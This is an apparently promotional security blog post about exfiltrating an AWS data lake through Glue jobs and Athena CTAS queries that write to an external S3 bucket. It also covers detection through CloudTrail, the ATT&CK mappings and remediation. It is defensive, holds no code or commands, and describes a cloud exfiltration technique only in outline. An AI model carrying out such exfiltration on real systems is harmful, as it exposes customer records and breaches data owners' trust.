Glue and Athena exfiltration: the data lake leaves through the front door

Glue and Athena are everyday analytics tools, which is exactly why a compromised analytics role can drain the data lake in plain sight. The queries look like business as usual. What gives the attacker away is where the output goes.

How the attack works

Using a role that already runs ETL and SQL every day, the attacker starts a Glue job and runs an Athena CREATE TABLE AS SELECT that writes results to an S3 bucket outside the data-lake account boundary. Bulk objects sized to whole tables of customer records land in the attacker location, and the role iterates jobs across more databases to widen the export to the same destination. CloudTrail management events, the Glue and Athena run histories, and S3 data events all record it. In ATT&CK terms this is T1530, Data from Cloud Storage, with T1567.002, Exfiltration to Cloud Storage.

Why it works

The analytics role held blanket Glue and Athena permissions and could write query results anywhere. Nothing pinned the Athena workgroup output location or the Glue job destination to an approved bucket, and no guardrail blocked a write across the account boundary.

How to fix it

Do not kill Glue or delete the lake buckets, which would break legitimate analytics and destroy evidence. Instead, strip the compromised role’s Glue, Athena, and S3 write permissions, deny its live session by aws:TokenIssueTime, and add a bucket policy or service control policy that denies writes to the external destination. The non-obvious move is to constrain the egress path itself: pin Athena workgroup result locations and Glue job output to approved buckets and add organization guardrails that block any cross-boundary write, so a future over-broad role still cannot ship data out.

Practice it

We built this as a GraphLattice Range scenario so responders learn to scope the abused role and block the destination, rather than nuking the analytics platform.